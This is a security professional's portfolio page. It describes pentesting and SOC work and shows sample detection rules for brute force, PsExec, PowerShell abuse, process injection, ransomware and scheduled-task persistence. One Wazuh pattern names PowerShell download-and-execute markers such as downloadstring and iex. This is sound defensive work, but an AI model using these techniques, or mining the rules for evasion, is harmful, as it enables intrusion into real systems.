Penetration Tester
& SOC Analyst
Dual offensive/defensive background — web app pentesting, bug bounty on HackerOne & Bugcrowd, plus 500+ endpoint SIEM engineering at PostEx.
// about.me
Offensive Mindset,
Defensive Depth
Cybersecurity professional with 3+ years of experience and a dual offensive/defensive background, now focused on web application penetration testing and bug bounty research.
Proficient in full-cycle web app pentesting — recon through exploitation and reporting — applying OWASP Top 10 methodology, Burp Suite Pro, and manual exploitation across XSS, SQLi, IDOR, authentication flaws, and business logic vulnerabilities. Actively hunting on HackerOne and Bugcrowd.
Real-world detection engineering experience — authoring 40+ MITRE ATT&CK-mapped rules across a 500+ endpoint fintech environment — directly informs attacker thinking and exploit identification depth.
// work.history
Professional Experience
Cybersecurity Engineer & SOC Analyst
PostEx (Fintech)
- ›Engineered 40+ custom detection rules mapped to MITRE ATT&CK (T1059, T1486, T1078, T1053), developing attacker-pattern intuition applied directly to offensive research.
- ›Conduct proactive threat hunting across endpoint telemetry surfacing lateral movement, persistence, and C2 patterns — skills transferable to purple/red team scenarios.
- ›Perform vulnerability assessments using OpenVAS and Nmap; lead CVE analysis, CVSS prioritization, and OS hardening per CIS Benchmark controls.
- ›Operate Elastic Defend EDR — monitor process injection, file activity, network behavior — building hands-on understanding of EDR detection logic exploited during offensive engagements.
- ›Reduced SIEM false positives by 40% through correlation tuning, threshold calibration, and log filtering.
- ›Designed n8n automation pipelines achieving sub-2-minute MTTN for P1/P2 alerts via Telegram and email.
Assistant Network Administrator
PostEx (Fintech)
- ›Managed firewall ACL rules, VLAN segmentation, and network topology for 500+ node environment — network knowledge directly supporting network-layer pentest reconnaissance.
- ›Configured MikroTik routers with OSPF/BGP routing and L2VPN tunnels; supported threat containment by isolating compromised segments during SOC-flagged incidents.
- ›Maintained change logs, device configurations, and network documentation supporting audit and compliance requirements.
Technical Support Engineer
StormFiber
- ›Diagnosed L1/L2/L3 network faults for enterprise customers; coordinated with NOC during outages following SLA escalation procedures.
// tech.stack
Tools & Technologies
Pentest Tools
Recon & OSINT
SIEM & Detection
Networking & Infra
Scripting & Frameworks
// projects
Featured Work
Bug Bounty & Web Application Security Research
Active hunting on HackerOne and Bugcrowd. Apply systematic OWASP Top 10 methodology across public programs. Identified and reported reflected/stored XSS, SQLi, IDOR, broken auth, and business logic flaws. Multi-phase recon: subdomain enum, JS file analysis, parameter discovery.
Web Application Penetration Testing Lab
Self-hosted lab (DVWA, Metasploitable, custom Docker targets) for full exploitation chain practice. Covers SQLi, XSS, file upload bypasses, SSRF, JWT cracking, deserialization, SSTI, and API exploitation.
Authentication & Session Attack Research
Deep-dive into broken auth chains: JWT alg:none, session fixation, OAuth misconfiguration, MFA bypass, and password reset host-header injection. PoC-driven with CVSS scoring.
MITRE ATT&CK Detection Rule Library
Developed 40+ detection rules across 15+ ATT&CK techniques (T1059, T1486, T1078, T1053, T1136, T1021) for ransomware, lateral movement, and persistence. Reverse-engineering rule logic informs evasion thinking for offensive engagements.
SOC Automation Pipeline (n8n)
Designed n8n automation achieving sub-2-minute MTTN for P1/P2 alerts. Auto-creates JIRA tickets, sends Telegram/email notifications, and isolates endpoints via Wazuh active response.
SIEM False Positive Reduction Program
Reduced Wazuh/Splunk false positives by 40% through correlation tuning, threshold calibration, and log filtering. Structured analytical methodology directly applicable to pentest triage.
Vulnerability Assessment & Hardening Program
Recurring OpenVAS and Nmap scanning across 500+ node infrastructure. Prioritized by CVSS and business impact. Applied CIS Benchmark hardening (Linux + Windows Server), eliminating high-severity misconfigs.
Zero-Trust Network Segmentation
VLAN-based micro-segmentation across 50+ segments using MikroTik and firewall ACL policy enforcement. OSPF/BGP routing with L2VPN tunnel management.
EDR Monitoring & Endpoint Hardening
Operate Elastic Defend EDR monitoring process injection, file activity, and network behavior. Hands-on understanding of EDR detection logic exploited during offensive engagements.
// detection.rules
Detection Research
Production-grade detection rules deployed across the PostEx security stack (ELK + Wazuh). Mapped to MITRE ATT&CK. Offensive value: reverse-engineering rule logic exposes detection gaps and informs evasion thinking for pentest engagements.
Brute Force Detection
T1110 · Brute Forceindex=windows_security EventCode=4625
| bucket span=5m _time
| stats count dc(src_ip) as unique_ips
values(src_ip) as src_ips
by _time dest_user Account_Name
| where count > 10
| eval risk_score=if(count>50,"CRITICAL",
if(count>20,"HIGH","MEDIUM"))
| table _time dest_user count unique_ips
src_ips risk_score | sort - countLateral Movement via PsExec
T1021.002 · SMB/Windows Admin Sharestitle: Lateral Movement via PsExec
id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d
status: production
author: Asad Noor
logsource:
product: windows
service: system
detection:
selection:
Channel: System
EventID: 7045
ServiceName: 'PSEXESVC'
condition: selection
falsepositives:
- Legitimate admin usage
level: high
tags:
- attack.t1021.002
- attack.lateral_movementMalicious PowerShell Execution
T1059.001 · PowerShell<group name="powershell,t1059,windows,">
<rule id="100301" level="12">
<if_group>windows_security</if_group>
<field name="win.eventdata.commandLine"
type="pcre2">
(?i)(EncodedCommand|bypass|hidden|
downloadstring|iex|invoke-expression)
</field>
<description>T1059.001: Suspicious
PowerShell execution</description>
<mitre><id>T1059.001</id></mitre>
</rule>
</group>Process Injection Hunt
T1055 · Process Injectionsequence by host.name with maxspan=30s
[process where event.type == "start"
and process.name :
("cmd.exe","powershell.exe")
and process.parent.name :
("svchost.exe","explorer.exe")]
[network where destination.port
in (443, 4444, 8080)
and not destination.ip : "10.0.0.0/8"
and not destination.ip : "172.16.0.0/12"]Ransomware Behaviour Hunt
T1486 · Data Encrypted for Impactindex=sysmon EventCode=11
file_name="*.encrypted" OR
file_name="*.locked" OR
file_name="READ_ME*" OR
file_name="HOW_TO_DECRYPT*"
| stats count dc(file_name) as unique_files
values(file_name) as files by host
| where unique_files > 20
| eval severity="CRITICAL"
| table host unique_files files severity
| sort - unique_filesPersistence via Scheduled Task
T1053.005 · Scheduled Task<group name="persistence,t1053,windows,">
<rule id="100401" level="10">
<if_group>windows_security</if_group>
<field name="win.system.eventID"
type="pcre2">^4698$</field>
<description>T1053.005: Scheduled task
created - possible persistence</description>
<mitre><id>T1053.005</id></mitre>
<group>persistence,</group>
</rule>
<rule id="100402" level="14"
frequency="3" timeframe="300">
<if_matched_sid>100401</if_matched_sid>
<description>Repeated sched task
creation - high confidence T1053</description>
</rule>
</group>// learning.certs
Certifications & Learning
Verified Certifications (In Progress / Planned marked separately)
PortSwigger Web Security Academy
Actively completing all lab modules
// contact
